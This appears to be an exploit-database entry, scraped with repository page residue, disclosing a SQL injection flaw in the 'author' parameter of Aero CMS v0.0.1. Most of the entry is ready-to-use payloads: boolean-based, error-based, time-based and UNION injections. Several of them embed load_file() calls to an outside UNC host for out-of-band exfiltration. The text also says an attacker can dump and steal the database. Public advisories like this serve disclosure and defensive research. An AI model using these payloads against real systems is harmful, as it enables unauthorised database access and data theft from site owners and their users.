
7 changes to exploits/shellcodes Teleport v10.1.1 - Remote Code Execution (RCE) TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) Aero CMS v0.0.1 - SQLi Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
47 lines
No EOL
1.8 KiB
Text
47 lines
No EOL
1.8 KiB
Text
# Title: Aero CMS v0.0.1 - SQLi
|
|
# Author: nu11secur1ty
|
|
# Date: 08.27.2022
|
|
# Vendor: https://github.com/MegaTKC
|
|
# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
|
|
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
|
|
|
|
# Description:
|
|
The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
|
|
be vulnerable to SQL injection attacks.
|
|
The malicious user can dump-steal the database, from this CMS system
|
|
and he can use it for very malicious purposes.
|
|
|
|
STATUS: HIGH Vulnerability
|
|
|
|
[+]Payload:
|
|
```mysql
|
|
---
|
|
Parameter: author (GET)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause
|
|
Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
|
|
GROUP BY clause (FLOOR)
|
|
Payload: author=admin'+(select
|
|
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
|
|
OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
|
|
(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: author=admin'+(select
|
|
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
|
|
AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4
|
|
|
|
Type: UNION query
|
|
Title: MySQL UNION query (NULL) - 10 columns
|
|
Payload: author=admin'+(select
|
|
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
|
|
UNION ALL SELECT
|
|
NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
|
|
---
|
|
|
|
``` |